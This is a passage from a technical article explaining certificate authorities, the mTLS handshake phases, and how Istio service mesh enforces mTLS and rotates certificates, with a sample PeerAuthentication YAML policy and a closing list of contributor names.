3rd party that verifies user identity and issues an encrypted digital certificate containing the applicant's public key and other information. Notable CAs are VeriSign, Entrust, LetsEncrypt, Safescript Limited, etc. Root CA/Certificate Chain Certificate Authority hierarchies are created to distribute the workloads of issuing certificates. There can be entities issuing certificates from different CA at various levels. In the multi-level hierarchy (like parent and child) of CAs, there is one CA at the top, called the Root CA (refer to the below image). Each CA would also have its certificate issued by the parent CA, and the root CA will have self-signed certificates. To ensure the CA (which issued the certificate to the client/server) is trusted, the security protocol suggests that entities send their digital certificate and the entire chain leading up to the root CA. Public and Private Key Pair While creating certificates for an entity, the CA would generate a public and a private key- commonly called a public key pair. The public and private keys are used to authenticate their identity and encrypt data. Public keys are published, but the private key is kept secret. If you are interested to learn about the algorithms to generate public keys, read more on RSA, DSA, ECDSA, and ed25519. X.509 Certificate It is a special category of the certificate, defined by the International Telecommunications Union, which binds an application's identity (hostname, organization name, etc.) to a public key using a digital signature. It is the most commonly used certificate in all the security protocols SSL/TLS/mTLS for securing web applications. How Does mTLS Work? As explained earlier, the mTLS has a similar implementation of sub-protocols as SSL. There are 8 phases (mentioned below) for two applications to talk to each other using the mTLS protocol. Establish security capabilities with hello: The client tries to communicate with the server (also known as client hello). The client hello message would contain values for specific parameters such as mTLS version, session id, Cipher suite, compression algorithm, etc. The server also would send a similar response called server hello with the values (it supports) for the same parameters sent by the client. Server authentication and key exchange: In this phase, the server would share its digital certificate (mostly X.509 certificates for microservices) and the entire chain leading up to root CA to the client. It would also request the client's digital certificate. Client verifies the server's certificate: The client would use the public key in the digital certificate to validate the server's authenticity. Client authentication and key exchange: After validation, the client sends a digital certificate to the server for verification. Server verifies client's certificate: The server verifies the client's authenticity. Master key generation and handshake complete: Once the parties' authenticity is established, the client and server will establish a handshake, and two new keys will be generated; shared secret information is only known to the parties and active for the session. Master secret: for encryption Message Authentication Code (MAC): for assuring message integrity Communication encrypted and transmission starts: The exchange of the information will begin with all the messages or packets encrypted using the master secret key. Behind the veil, the mTLS protocol will divide the message into smaller blocks called fragments, compress each fragment, add the MAC for each block, and finally encrypt them using the master secret. Data transmission starts: Finally, the mTLS protocol will append headers to the blocks of messages and send it to TCP protocol to send it to the destination or receiver. Session ends: Once the communication completes, the session will close. If an anomaly is detected during the transmission, the mTLS protocol will destroy all the keys and secrets and terminate the session immediately. Note: In the above phases, we have assumed that the CA would have issued a certificate to the entities which are still valid. In reality, the certificate of mission-critical applications expires soon, and there is a requirement for constant certificate rotation (we will straight away jump into how Istio enables mTLS and certificate rotation). How To Enable mTLS and Certificate Rotation Using Istio Service Mesh Istio service mesh is an infrastructure layer that abstracts out the network and security later out of application layers. It does so by injecting an Envoy proxy (an L4 and L7 sidecar proxy) into each application and listening to all the network communication. mTLS Implementation in Istio Though Istio supports multiple authentication types, it is best known for implementing mTLS to applications hosted over the cloud, on-prem, or Kubernetes infrastructure. The Envoy proxy acts as Policy Enforcement Points (PEP); you can implement mTLS using the peer-to-peer (p2p) authentication policy provided by Istio and enforce it through the proxies at the workload level. Example of p2p authentication policy in Istio to apply mTLS to demobank app in the istio-nm namespace: YAML apiVersion: security.istio.io/v1beta1 kind: PeerAuthentication metadata: name: "mTLS-peer-policy" namespace: "istio-nm" spec: selector: matchLabels: app: demobank mtls: mode: STRICT The working mechanism of mTLS authentication in Istio is as follows: At first, all the outbound and inbound traffic to any application in the mesh is re-routed through the Envoy proxy. The mTLS happens between the client-side Envoy proxy and the server-side Envoy proxy. The client-side Envoy proxy would try to connect with the server-side Envoy proxy by exchanging certificates and proving their identity. Once the authentication phase is completed successfully, a TCP connection between the client and service side Envoy proxy is established to carry out encrypted communications. Note that mTLS with Istio can be implemented at all levels: application, namespace, or mesh-wide. Certificate Management and Rotation in Istio Service Mesh Istio provides a stronger identity by issuing X.509 certificates to Envoy proxies attached to applications. The certificate management and rotation are done by an Istio agent running in the same container as the Envoy proxy. The Istio agents talk to the Istiod- the control plane of Istio- to effectively circulate the digital certificates with public keys. Below are the details phases of certificate management in Istio: Istio agents generate public key pairs (private and public keys) and then send the public key to the Istio control plane for signing. This is called a certificate signing request (CSR). Istiod has a component (earlier Galley) that acts as the CA. Istiod validates the public key in the request, signs, and issues a digital certificate to the Istio agent. When mTLS connection is required, Envoy proxies fetch the certificate from the Istio agent using Envoy secret discovery service (SDS) API. The Istio agent observes the expiration of the certificate used by the Envoy. Upon the certificate's expiry, the agent initiates a CSR to Istiod. Network Security With Open-Source Istio Microservices architecture is the norm nowadays. The distributed nature of applications gives a high attack surface for intruders since these applications communicate with each other over a network. Security cannot be an afterthought in such a scenario as it can lead to catastrophic data breaches. Implementing mTLS with Istio is an effective way to secure communication between cloud-native applications. And many leading companies like Splunk, Airbnb, and Salesforce, use open-source Istio to enable mTLS and enhance the security of their applications.
Apostolos Giannakidis
Product Security,
Microsoft
Samir Behara
Senior Cloud Infrastructure Architect,
AWS
Boris Zaikin
Senior Software Cloud Architect,
Nordcloud GmBH
Anca Sailer
Distinguished Engineer,
IBM